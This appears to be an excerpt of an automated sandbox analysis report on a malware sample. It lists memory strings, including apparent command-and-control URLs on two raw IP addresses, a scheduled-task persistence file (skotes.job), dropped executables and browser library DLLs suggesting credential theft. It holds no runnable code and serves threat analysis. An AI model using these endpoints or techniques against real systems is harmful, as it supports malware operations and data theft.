Source: file.exe, 00000000.00000002.1979370069.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php003
Source: file.exe, 00000000.00000003.1608261081.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743257678.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php6
Source: file.exe, 00000000.00000003.1743257678.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpE
Source: file.exe, 00000000.00000003.1743257678.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1979370069.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpG
Source: file.exe, 00000000.00000003.1608261081.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743257678.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpO
Source: file.exe, 00000000.00000002.1999524290.00000000233AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpUE
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
Source: file.exe, 00000000.00000002.1978262092.0000000000777000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpc60ab594776c83eaa9bd06ecc7f8
Source: file.exe, 00000000.00000003.1743257678.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phprowser
Source: file.exe, 00000000.00000002.1979370069.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.2060
Source: file.exe, 00000000.00000002.1978262092.0000000000777000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206BFHming
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php(
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php4
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpL8
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpi
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpt8
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: chromecache_103.5.dr	String found in binary or memory: http://www.broofa.com
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2008434373.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2005412674.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1996036540.000000001D259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.1608148634.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, GHDAAKJE.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_103.5.dr	String found in binary or memory: https://apis.google.com
Source: file.exe, 00000000.00000002.1999524290.00000000233A1000.00000004.00000020.00020000.00000000.sdmp, GHDBKFHIJKJKECAAAECA.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: file.exe, 00000000.00000002.1999524290.00000000233A1000.00000004.00000020.00020000.00000000.sdmp, GHDBKFHIJKJKECAAAECA.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: file.exe, 00000000.00000003.1608148634.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, GHDAAKJE.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1608148634.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, GHDAAKJE.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1608148634.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, GHDAAKJE.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1999524290.00000000233A1000.00000004.00000020.00020000.00000000.sdmp, GHDBKFHIJKJKECAAAECA.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000000.00000002.1999524290.00000000233A1000.00000004.00000020.00020000.00000000.sdmp, GHDBKFHIJKJKECAAAECA.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.1608148634.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, GHDAAKJE.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1608148634.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, GHDAAKJE.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1608148634.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, GHDAAKJE.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_103.5.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_103.5.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_103.5.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_103.5.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: GHDBKFHIJKJKECAAAECA.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: chromecache_103.5.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: KFCFBAAEHCFHJJKEHJKJDHJDGI.0.dr	String found in binary or memory: https://support.mozilla.org
Source: KFCFBAAEHCFHJJKEHJKJDHJDGI.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KFCFBAAEHCFHJJKEHJKJDHJDGI.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: file.exe, 00000000.00000002.1999524290.00000000233A1000.00000004.00000020.00020000.00000000.sdmp, GHDBKFHIJKJKECAAAECA.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.1608148634.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, GHDAAKJE.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chromecache_103.5.dr	String found in binary or memory: https://www.google.com
Source: file.exe, 00000000.00000003.1608148634.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, GHDAAKJE.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_103.5.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_103.5.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_103.5.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: file.exe, 00000000.00000002.1999524290.00000000233A1000.00000004.00000020.00020000.00000000.sdmp, GHDBKFHIJKJKECAAAECA.0.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: KFCFBAAEHCFHJJKEHJKJDHJDGI.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1978262092.00000000006DC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: KFCFBAAEHCFHJJKEHJKJDHJDGI.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: file.exe, 00000000.00000002.1978262092.00000000006DC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: KFCFBAAEHCFHJJKEHJKJDHJDGI.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: KFCFBAAEHCFHJJKEHJKJDHJDGI.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1978262092.00000000006DC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1865919036.0000000023610000.00000004.00000020.00020000.00000000.sdmp, KFCFBAAEHCFHJJKEHJKJDHJDGI.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.8:49741 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: JDGIECGIEB.exe.0.dr	Static PE information: section name:
Source: JDGIECGIEB.exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: skotes.exe.16.dr	Static PE information: section name:
Source: skotes.exe.16.dr	Static PE information: section name: .idata
Source: 931e3b56d4.exe.20.dr	Static PE information: section name:
Source: 931e3b56d4.exe.20.dr	Static PE information: section name: .idata
Source: 931e3b56d4.exe.20.dr	Static PE information: section name:

Creates files inside the system directory

Source: C:\Users\user\Documents\JDGIECGIEB.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB3ECD0	0_2_6CB3ECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CADECC0	0_2_6CADECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBAC30	0_2_6CBBAC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA6C00	0_2_6CBA6C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAEAC60	0_2_6CAEAC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC6CDC0	0_2_6CC6CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE4DB0	0_2_6CAE4DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB76D90	0_2_6CB76D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC0AD50	0_2_6CC0AD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAED70	0_2_6CBAED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC68D20	0_2_6CC68D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB66E90	0_2_6CB66E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAEAEC0	0_2_6CAEAEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB80EC0	0_2_6CB80EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC0E20	0_2_6CBC0E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB7EE70	0_2_6CB7EE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAEEFB0	0_2_6CAEEFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBEFF0	0_2_6CBBEFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE0FE0	0_2_6CAE0FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC28FB0	0_2_6CC28FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE6F10	0_2_6CAE6F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA2F70	0_2_6CBA2F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC20F20	0_2_6CC20F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB4EF40	0_2_6CB4EF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE68E0	0_2_6CBE68E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB30820	0_2_6CB30820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB6A820	0_2_6CB6A820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB4840	0_2_6CBB4840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA09B0	0_2_6CBA09B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB709A0	0_2_6CB709A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9A9A0	0_2_6CB9A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB149F0	0_2_6CB149F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFC9E0	0_2_6CBFC9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB36900	0_2_6CB36900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB18960	0_2_6CB18960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB5EA80	0_2_6CB5EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB98A30	0_2_6CB98A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB8EA00	0_2_6CB8EA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB5CA70	0_2_6CB5CA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB80BA0	0_2_6CB80BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE6BE0	0_2_6CBE6BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC0A480	0_2_6CC0A480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB264D0	0_2_6CB264D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB7A4D0	0_2_6CB7A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB6A430	0_2_6CB6A430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB44420	0_2_6CB44420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF8460	0_2_6CAF8460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD45B0	0_2_6CAD45B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB6E5F0	0_2_6CB6E5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAA5E0	0_2_6CBAA5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC28550	0_2_6CC28550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB80570	0_2_6CB80570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB42560	0_2_6CB42560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB38540	0_2_6CB38540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE4540	0_2_6CBE4540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB3E6E0	0_2_6CB3E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB7E6E0	0_2_6CB7E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB046D0	0_2_6CB046D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB3C650	0_2_6CB3C650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0A7D0	0_2_6CB0A7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB60700	0_2_6CB60700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBC0B0	0_2_6CBBC0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF00B0	0_2_6CAF00B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD8090	0_2_6CAD8090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA8010	0_2_6CBA8010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAC000	0_2_6CBAC000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB2E070	0_2_6CB2E070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE01E0	0_2_6CAE01E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB56130	0_2_6CB56130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC4130	0_2_6CBC4130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB48140	0_2_6CB48140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC662C0	0_2_6CC662C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAE2B0	0_2_6CBAE2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB22A0	0_2_6CBB22A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB8220	0_2_6CBB8220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAA210	0_2_6CBAA210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB68260	0_2_6CB68260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB78250	0_2_6CB78250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB3E3B0	0_2_6CB3E3B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB123A0	0_2_6CB123A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB343E0	0_2_6CB343E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB52320	0_2_6CB52320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC22370	0_2_6CC22370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB76370	0_2_6CB76370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE2370	0_2_6CAE2370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFC360	0_2_6CBFC360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE8340	0_2_6CAE8340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC1DCD0	0_2_6CC1DCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB7FC80	0_2_6CB7FC80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA1CE0	0_2_6CBA1CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC09C40	0_2_6CC09C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF1C30	0_2_6CAF1C30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE3C40	0_2_6CAE3C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD3D80	0_2_6CAD3D80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC29D90	0_2_6CC29D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB1DC0	0_2_6CBB1DC0
